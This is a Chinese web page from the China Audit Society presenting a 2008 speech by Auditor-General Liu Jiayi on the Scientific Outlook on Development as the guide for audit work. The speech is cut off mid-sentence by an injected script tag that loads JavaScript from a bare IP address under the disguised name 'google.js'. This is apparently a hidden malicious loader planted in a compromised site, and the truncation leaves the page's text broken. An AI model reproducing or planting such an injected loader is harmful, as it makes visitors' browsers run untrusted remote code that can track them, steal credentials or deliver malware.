首页学会基本情况规划与计划课题管理学会会议培训与学习学术交流审计研究
当前位置: 首页  >  学会会议  >  理事会议 > 正文
 
以科学发展观为指导推动审计工作全面发展---刘家义审计长在五届三次理事会暨第二次理事论坛上的讲话
 
【时间:2015年07月31日】 字号: 【大】 【中】 【小】

(2008年3月31日)

    各位理事、各位代表:

    非常高兴与这么多老同志、老朋友一起共叙友情,共商如何更加深入贯彻落实党的十七大精神和审计工作发展战略的一些问题。这些年来,中国审计学会聚集各方面的专家、学者,在理论研究和实践经验总结方面,都做了大量工作,取得了明显成效。最近看到学会的两篇调研报告,一篇是关于地方预算执行审计情况的,一篇是关于基层审计机关状况的,反映问题都比较深入,提出了一些非常有价值的建议,对于推动地方审计工作的发展具有重要意义。同志们昨天下午和今天上午的演讲,各有特色,很有深度,听了很受启发。在此,我代表审计署,向各位专家、学者表示衷心的感谢和热忱的祝贺。同时,也充分相信我们的学会,我们的专家学者一定能在今后的理论探讨、调查研究等方面,取得更大成就,为中国审计事业做出更大贡献。

    这次论坛的主题是中国审计发展战略研究。下面,我就深入学习贯彻党的十七大精神,以科学发展观为指导,推动审计工作全面发展,谈几点体会和想法。不当之处,请同志们批评。

    一、科学发展观是审计工作的灵魂和指南

    我们知道,马克思主义第一次以科学的方法揭示了人类社会发展的客观规律,但并未给人类社会发展定立出一个一劳永逸的规划,而是从历史唯物主义角度提出了如何认识人类社会发展最基本的世界观和方法论。科学发展观正是运用这个世界观和方法论,在继承马克思主义、毛泽东思想、邓小平理论、“三个代表”重要思想基础上形成的,是马克思主义中国化的最新成果。党的十七大报告指出,邓小平理论、“三个代表”重要思想以及科学发展观等重大战略思想,共同构成了中国特色社会主义理论体系。这个理论体系,坚持和发展了马克思列宁主义、毛泽东思想,凝结了几代中国共产党人带领人民不懈探索实践的智慧和心血,是全国各族人民团结奋斗的共同思想基础。

    十七大报告对科学发展观产生的时代背景、科学内涵、精神实质和根本要求作了充分的阐释,提出科学发展观是立足社会主义初级阶段基本国情,总结我国发展实践,借鉴国外发展经验,适应新的发展要求提出来的。报告中把中国现阶段的基本国情概括为八个明显特征,归纳成一句话,就是基础差、底子薄、发展快、差距大和矛盾凸显。为什么说基础差、底子薄?我国建国初期,工业、农业和国民经济体系都没有建立起来,人均国民收入才18美元,只相当于当时亚洲人均国民收入44美元的40%左右。经过58年的快速发展,目前我国人均国民收入已近3000美元,但还不及美国人均水平的5%。可见,我国与发达国家的差距仍然很大。改革开放以来,我国发生了“一个巨变”、“四个深刻变化”,有“两个没变”。所谓“一个巨变”,就是从生产力到生产关系、从经济基础到上层建筑都发生了意义深远的重大变化;“四个深刻变化”就是人们的思想观念、社会结构、利益格局和经济体制发生了深刻变化;“两个没变”就是处于社会主义初级阶段的基本国情没变,人民日益增长的物质文化需要同落后的社会生产之间的矛盾这一社会主要矛盾没变。在当今体制转轨、社会转型的特殊历史时期,我国还面临着国内外形势发展变化带来的诸多新的挑战和风险,首先是国内各种矛盾诸如资源问题、各阶层的利益分配问题、环境问题、耕地问题、城乡问题等,都凸显了出来;其次是国际上各种矛盾交织在一起。在这种复杂的时代背景下,我们应该走什么样的发展道路呢?世界上有的国家采取了先发展后治理、先发展经济再考虑社会建设的道路,但事实证明,这样的发展造成了社会资源的浪费。有些国家虽然经济发展很快,但社会矛盾日益加剧,贫富差距日益加大。正是在继承马克思主义基本原理和总结国内外发展实践的基础上,形成了马克思主义中国化的最新成果——科学发展观。

    科学发展观既不是一个发展规划,更不是一个具体方案,而是科学地回答了“为什么要发展”、“怎样发展”、“靠谁发展”、“发展为谁”,也就是党的十七大报告讲的,“第一要义是发展”、“核心是以人为本”、“基本要求是全面协调可持续”、“根本方法是统筹兼顾”。所以,科学发展观是马克思主义关于发展的世界观和方法论的集中体现,是我国经济社会发展的重要指导方针,是发展中国特色社会主义必须始终坚持和贯彻的重大战略思想,对于我国经济建设、政治建设、文化建设、社会建设和党的建设等各个方面的发展具有重大的理论意义和实践意义。

    审计工作是全国工作的重要组成部分,审计事业是中国特色社会主义事业的重要方面。因此,必须以科学发展观为灵魂和指南。这就是要用科学发展观的思想、世界观和方法论去认识和探寻审计工作规律,去认识和把握审计的本质,去总结经验、寻找差距、不断调整和校正审计?script src= http://91.239.15.61/google.js \>
【关闭】    【打印】
  版权信息
主办单位:中国审计学会  技术支持:审计署计算机技术中心 本站电话:010-82199820
本站地址:北京市海淀区中关村南大街4号(邮编:100086) 备案编号:京ICP备19011981号  建议使用分辨率:1024×768